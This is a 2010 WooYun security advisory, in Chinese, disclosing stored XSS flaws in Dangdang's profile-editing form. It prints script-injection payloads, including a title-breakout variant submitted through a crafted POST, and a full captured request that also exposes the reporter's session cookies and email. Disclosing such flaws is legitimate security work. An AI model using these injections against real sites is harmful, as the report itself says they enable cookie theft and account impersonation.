当当网多处存储型XSS漏洞 | wooyun-2010-0254| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2010-0254

漏洞标题：当当网多处存储型XSS漏洞

漏洞作者：路人甲

提交时间：2010-08-22 01:47

修复时间：2010-08-22 11:49

公开时间：2010-08-22 11:49

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2010-08-22：积极联系厂商并且等待厂商认领中，细节不对外公开
2010-08-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

当当网存在多处存储型XSS漏洞

详细说明：

在当当网的编辑个人档案中存在5处XSS漏洞，前4处分别出现在博客地址、兴趣爱好、喜欢或欣赏的人和自我介绍中，向其写入XSS语句 <script>alert(/1/)</script> 均可被执行，另外一处出现在昵称中，由于有长度限制，因此可通过本地构造POST表单来提交 </title><script>alert(/1/)</script> 执行js脚本，用于窃取用户cookie并仿冒用户登录。

漏洞证明：

Host=customer.dangdang.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 (BT-beachlife) Firefox/3.6.8
Accept=text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=zh-cn,zh;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Referer=http://customer.dangdang.com/profile/Myarchives.php?save=ok
Cookie=__permanent_id=20100203235038955135819263359204968; __new_p_id=1; __ozlvd=1282408219; producthistoryname=Windows%C4%DA%BA%CB%CA%B5%D1%E9%BD%CC%B3%CC%28%B8%BD%B9%E2%C5%CC
%29%2CWeb+%B0%B2%C8%AB%B2%E2%CA%D4%2CWeb%C8%EB%C7%D6%B0%B2%C8%AB%B2%E2%CA%D4%D3%EB%B6%D4%B2%DF%A3%A8%B8%BDCD-ROM%B9%E2%C5%CC%D2%BB%D5%C5%A3%A9%2CSQL%D7%A2%C8%EB%B9%A5%BB%F7%D3%EB
%B7%C0%D3%F9%A3%A8%B0%B2%C8%AB%BC%BC%CA%F5%BE%AD%B5%E4%D2%EB%B4%D4%A3%A9%2CPHP%BA%CDMySQL+Web%BF%AA%B7%A2+%A3%A8%D4%AD%CA%E9%B5%DA4%B0%E6%A3%A9%2CWEB%B0%B2%C8%AB%CA%D6%B2%E1%2C
%BB%D2%C3%B1%B9%A5%BB%F7%B0%B2%C8%AB%CA%D6%B2%E1%A1%AA%A1%AA%C9%F8%CD%B8%B2%E2%CA%D4%D3%EB%C2%A9%B6%B4%B7%D6%CE%F6%BC%BC%CA%F5%2C%BA%DA%BF%CD%B9%A5%B7%C0%BC%BC%CA
%F5%B1%A6%B5%E4%3A+Web%CA%B5%D5%BD%C6%AA%2C%CD%F8%C2%E7%C9%F8%CD%B8%B2%E2%CA%D4%A3%AD%B1%A3%BB%A4%CD%F8%C2%E7%B0%B2%C8%AB%B5%C4%BC%BC%CA%F5%A1%A2%B9%A4%BE%DF%BA%CD%B9%FD%B3%CC%2C
%CD%F8%C2%E7%B0%B2%C8%AB%C6%C0%B9%C0%A3%A8%B5%DA%B6%FE%B0%E6%A3%A9; 
producthistoryid=683764%2C20810140%2C9222047%2C20848476%2C20546846%2C9150871%2C9272693%2C20653653%2C20080185%2C20842796; validatedflag=0; cart_id=1005102129448895; 
__utma=263274265.1985588993.1278076754.1282149439.1282284535.9; __utmz=263274265.1282284535.9.4.utmcsr=product.dangdang.com|utmccn=(referral)|utmcmd=referral|utmcct=/product.aspx; 
HK=web%25B0%25B2%25C8%25AB%25B2%25E2%25CA%25D4%3B%25B0%25B2%25C8%25AB%25C2%25A9%25B6%25B4%25D7%25B7%25D7%25D9%3BWEB%25B0%25B2%25C8%25AB%25B2%25E2%25CA%25D4%3Bsql
%25D7%25A2%25C8%25EB%3BWeb%25C8%25EB%25C7%25D6%3B%25C9%25F8%25CD%25B8%3B%25C9%25F8%25CD%25B8%25B2%25E2%25CA%25D4%3BWEB%25C9%25F8%25CD%25B8%25B2%25E2%25CA%25D4%3BWEB
%25B0%25B2%25C8%25AB; from=488-133054; cart_db_index=3; cart_items_count=0; ck_db_index=3; is_new=1; __trace_id=20100822000612281259688254741795619; agree_date=1; 
login.dangdang.com=.AYH=100822001255147579&.ASPXAUTH=I3swGtBNKlIZFcNLIaO4tWX30HRxb+KI; LD=raSYRlzfovLiO635sEBP0drFJ8zWhCcs; 
dangdang.com=email=NzczMDgxODc4QHFxLmNvbQ==&nickname=&display_id=5533648947491&customerid=uGQo9p1MXgQ4TwpLZdhuKw==&viptype=4+AtZiSmtFY=&show_name=
%u0037%u0037%u0033%u0030%u0038%u0031%u0038%u0037%u0038; email=773081878%40qq.com; nickname=
Content-Type=multipart/form-data; boundary=---------------------------97891525516423
Content-Length=2559
POSTDATA =-----------------------------97891525516423
Content-Disposition: form-data; name="hd_value"
3
-----------------------------97891525516423
Content-Disposition: form-data; name="Myfile"; filename=""
Content-Type: application/octet-stream
-----------------------------97891525516423
Content-Disposition: form-data; name="hid_opt"
-----------------------------97891525516423
Content-Disposition: form-data; name="v_date"
27019229
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_petname"
p3h4ck
-----------------------------97891525516423
Content-Disposition: form-data; name="area_clientID"
ctl04
-----------------------------97891525516423
Content-Disposition: form-data; name="ctl04$s1"
1
-----------------------------97891525516423
Content-Disposition: form-data; name="ctl04$s2"
116
-----------------------------97891525516423
Content-Disposition: form-data; name="hd_area"
188
-----------------------------97891525516423
Content-Disposition: form-data; name="hd_area_parent"
116
-----------------------------97891525516423
Content-Disposition: form-data; name="gp_sex"
Rd_sex_1
-----------------------------97891525516423
Content-Disposition: form-data; name="Rd_sexis"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="gp_standing"
student
-----------------------------97891525516423
Content-Disposition: form-data; name="defaultValue"
±¾¿ÆÉú
-----------------------------97891525516423
Content-Disposition: form-data; name="Rd_standingis"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="Dp_year"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="Dp_month"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="Dp_day"
0
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_blog"
<script>alert(/1/)</script>
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_interesting"
<script>alert(/2/)</script>
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_love"
<script>alert(/3/)</script>
-----------------------------97891525516423
Content-Disposition: form-data; name="Txt_introduce"
<script>alert(/4/)</script>
-----------------------------97891525516423
Content-Disposition: form-data; name="Button1"
±£´æ»ù±¾ÐÅÏ¢
-----------------------------97891525516423--

修复方案：

过滤跨站关键字

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：7 (WooYun评价)

WooYun.org

漏洞概要 关注数(24) 关注此漏洞